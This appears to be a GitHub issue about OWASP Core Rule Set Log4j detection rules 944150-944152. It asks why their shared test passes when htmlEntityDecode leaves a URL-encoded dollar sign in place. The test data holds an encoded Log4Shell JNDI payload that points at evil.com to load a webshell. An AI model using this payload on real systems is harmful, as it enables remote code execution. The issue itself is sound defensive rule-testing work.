Understanding `htmlEntityDecode` within Log4j Rules `944150-16`, `944151-16` and `944152-16`

I have come across a bit of an issue with the following rules and tests:
- 944150 (944150-16)
- 944151 (944151-16)
- 944152 (944152-16)

The rules are all pretty much similar sans the different regexes 

The tests are also identical, reliant on the following json to match:
```json
{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}
```

The rules all run the following transformation functions:
- urlDecodeUni
- jsDecode
- htmlEntityDecode

The value of the JSON string after each transformation is as follows:
URL Decode: 
```json
{"foo": "\u002524{jndi:ldap://evil.com/webshell}"}
```
JS Decode: 
```
{"foo": "%24{jndi:ldap://evil.com/webshell}"}
```
Running html entity decode does not decode anything.

Now, based on that, the regexes do not match the string. 

Based off our understanding of [the spec](https://html.spec.whatwg.org/#character-references), theres no html entities left in the above to decode.
This is failing to pass because of the %24 which needs to be url decoded into a $. Html entity decoding would work if it was &#24; (as is the[ php implementation](https://www.php.net/manual/en/function.html-entity-decode.php))

Based off the ModSecurity [docs for htmlEntityDecode](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-%28v3.x%29#user-content-htmlEntityDecode), you may possibly think that the htmlEntityDecode function is just decoding HH directly, but the [code](https://github.com/owasp-modsecurity/ModSecurity/blob/a555e5a44573e50f04ad997b3b24c214c42f8e29/src/actions/transformations/html_entity_decode.cc#L41-L44) does show it looking for &# first.

My question is, should we add in another step of url decoding after both the js and html decode funcs (or even inbetween?)?

All of the regexes search for a `$`, and in this test string the dollar still remains url encoded, thus I am wondering how this test is passing or meant to pass in its current form.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

Understanding `htmlEntityDecode` within Log4j Rules `944150-16`, `944151-16` and `944152-16` #4017

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Uh oh!

Understanding htmlEntityDecode within Log4j Rules 944150-16, 944151-16 and 944152-16 #4017

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions

Understanding `htmlEntityDecode` within Log4j Rules `944150-16`, `944151-16` and `944152-16` #4017